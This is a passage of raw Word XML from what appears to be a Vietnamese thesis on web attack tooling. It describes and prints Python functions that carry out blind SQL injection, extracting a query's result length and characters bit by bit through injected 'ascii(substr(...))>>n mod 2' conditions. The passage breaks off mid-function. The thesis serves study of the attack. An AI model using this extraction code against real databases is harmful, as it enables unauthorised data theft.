      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm runner thực hiện chạy câu lệnh SQL, gọi đến hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00731E3A">
        <w:t>runMySQLQuery</w:t>
      </w:r>
      <w:r>
        <w:t>(), từ đây sẽ lần lượt thực hiện lấy độ dài kết quả, rồi lấy từng ký tự.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942DF4" w:rsidRDefault="00942DF4" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hàm __init__ thực hiện khởi tạo các thành phần liên quan, cần sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942DF4" w:rsidRDefault="00942DF4" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chi tiết về toàn bộ mã tấn công của phương pháp tìm kiếm nhị phân tham khảo </w:t>
      </w:r>
      <w:r w:rsidR="00D655B3">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>mục 2 P</w:t>
      </w:r>
      <w:r>
        <w:t>hụ lục</w:t>
      </w:r>
      <w:r w:rsidR="00610D75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A14DE">
        <w:t>của luận văn</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00650956" w:rsidRDefault="00650956" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc459822523"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Xây dựng mã tấn công sử dụng phương pháp dịch bit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w:rsidR="003B78B9" w:rsidRDefault="003B78B9" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Tương tự như phương pháp tìm kiếm nhị phân, để xây dựng mã tấn công dạng tìm kiếm nhị phân, luận văn sẽ xây dựng các hàm sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B78B9" w:rsidRDefault="002E332A" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hàm checkQuery(): Tương tự như phương pháp tìm kiếm nhị phân.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B78B9" w:rsidRDefault="003B78B9" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F18">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B78B9" w:rsidRDefault="003B78B9" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="006A00C0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B78B9" w:rsidRDefault="003B78B9" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các hàm mặc định tuân thủ theo chuẩn của </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5176">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK: Hàm run() và hàm __init()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00922FC1" w:rsidRDefault="002E332A" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="006A00C0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">() để xác định độ dài chuỗi, tuy nhiên sử dụng phương phát dịch bit. Giá trị sau khi lấy sẽ lần lượt được dịch từ 6 bit đến 0 bit (để lấy từ bit thứ 7 đến bit 0), đêm chia lấy phần dư với 2 rồi so sánh với 1. Nếu là đúng thì bit đó là 1, còn lại là 2. Mỗi khi lấy được 1 bit, sẽ cộng dồn vào giá trị tmp. Giá trị cộng thêm đó là số mũ của 2, với số số mũ chính là giá trị của bit. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00555378" w:rsidRPr="00536EBF" w:rsidTr="00555378">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:t>def getMySQLLength(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t xml:space="preserve">tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>for i in reversed(range(0, 7)):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>if(self.checkQuery("and (((length({0})&gt;&gt;{1}) mod 2)=1)".format(query, i))):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t># bit i is 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>self.logger.debug("Bit {0} is 1".format(i))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t xml:space="preserve">tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>tmp + pow(2,i)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>self.logger.debug("Bit {0} is 0".format(i))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00555378" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>tmp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F84439" w:rsidRPr="00922FC1" w:rsidRDefault="002E332A" w:rsidP="002E332A">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00555378">
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidR="00555378" w:rsidRPr="00555378">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r w:rsidR="00555378">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">() sử dụng thuật toán tương tự hàm </w:t>
      </w:r>
      <w:r w:rsidR="00555378" w:rsidRPr="006A00C0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r w:rsidR="00555378">
        <w:t>(), tuy nhiên sẽ lần lượt lấy giá trị từng ký tự.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidTr="00F84439">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:t>def getMySQLQueryResult(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="008F573F">
              <w:t>Bit shift</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>if(self.resultLength != None):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>for i in range(0, self.resultLength):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t># Single character</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t xml:space="preserve">tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>for j in reversed(range(0, 7)):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>if(self.checkQuery(" and (((ascii(substr({0},{1},1))&gt;&gt;{2}) mod 2)=1)".format(query, (i+1),j)) == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>self.logger.debug("Bit {0} is 1".format(j))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t xml:space="preserve">tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>tmp + pow(2,j)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>self.logger.debug("Bit {0} is 0".format(j))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>self.logger.info("Found character number {0} is: {1}".format(i+1, chr(tmp)))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t>chr(tmp)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F84439" w:rsidRPr="00F84439" w:rsidRDefault="00F84439" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00F84439">
              <w:tab/>
              <w:t># Second get result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F84439" w:rsidRDefault="00F84439" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Hàm runner thực hiện chạy câu lệnh SQL, gọi đến hàm </w:t>
      </w:r>
      <w:r w:rsidR="00731E3A" w:rsidRPr="00731E3A">
        <w:t>runMySQLQuery</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00731E3A">
        <w:t>, từ đây sẽ lần lượt thực hiện lấy độ dài kết quả, rồi lấy từng ký tự</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F84439" w:rsidRDefault="00F84439" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hàm __init__ thực hiện khởi tạo các thành phần liên quan, cần sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E332A" w:rsidRPr="00922FC1" w:rsidRDefault="00F84439" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chi tiết về toàn bộ mã tấn công của phương pháp tìm kiếm nhị phân tham khảo </w:t>
      </w:r>
      <w:r w:rsidR="00D655B3">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>mục 3 P</w:t>
      </w:r>
      <w:r>
        <w:t>hụ lục của luận văn</w:t>
      </w:r>
      <w:r w:rsidR="00B33ABE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00650956" w:rsidRDefault="00650956" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc459822524"/>
      <w:r>
        <w:t>Xây dựng mã tấn công sử dụng phương pháp phân tích thứ tự trả về</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w:rsidR="00CC2642" w:rsidRDefault="00CC2642" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Để xây dựng mã tấn công cho phương pháp phân tích thứ tự trả về, cần xây dựng các hàm sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7CF9" w:rsidRDefault="00DC7CF9" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC7CF9">
        <w:t>getQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7CF9" w:rsidRDefault="00DC7CF9" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidR="009B48A0" w:rsidRPr="009B48A0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r w:rsidR="009B48A0">
        <w:t xml:space="preserve">() và </w:t>
      </w:r>
      <w:r w:rsidR="009B48A0" w:rsidRPr="009B48A0">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r w:rsidR="009B48A0">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B48A0" w:rsidRDefault="009B48A0" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các hàm mặc định tuân thủ theo chuẩn của </w:t>
      </w:r>
      <w:r w:rsidRPr="009B48A0">
        <w:t>WETK: Hàm run() và hàm __init().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10140" w:rsidRDefault="00C10140" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hàm getQueryResult() nhận đầu vào là mã tấn công, thực hiện phân tích thứ tự trả về trích xuất ra giá trị của truy vấn.</w:t>
      </w:r>
      <w:r w:rsidR="00724DBD">
        <w:t xml:space="preserve"> Thứ tự ban đầu dùng để tham chiếu được thiết lập trong biến </w:t>
      </w:r>
      <w:r w:rsidR="00724DBD" w:rsidRPr="00724DBD">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>self.standard_dict.</w:t>
      </w:r>
      <w:r w:rsidR="00724DBD">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hàm thực hiện phân tích, tìm ra vị trí của dòng thứ nhất. Sau đó, lần lượt tìm vị trí dòng thứ hai, so sánh với vị trí dòng thứ nhất, nếu đứng trước thì bit đó là 0, nếu đứng sau thì bit đó là 1. Cuối cùng sẽ cộng dồn các giá trị tìm được để trả về kết quả:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidTr="00C10140">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:lastRenderedPageBreak/>
              <w:t>def getQueryResult(self, payload):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10140" w:rsidRPr="00C10140" w:rsidRDefault="00C10140" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
              <w:t xml:space="preserve">r </w:t>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C10140">
              <w:tab/>
            </w:r>
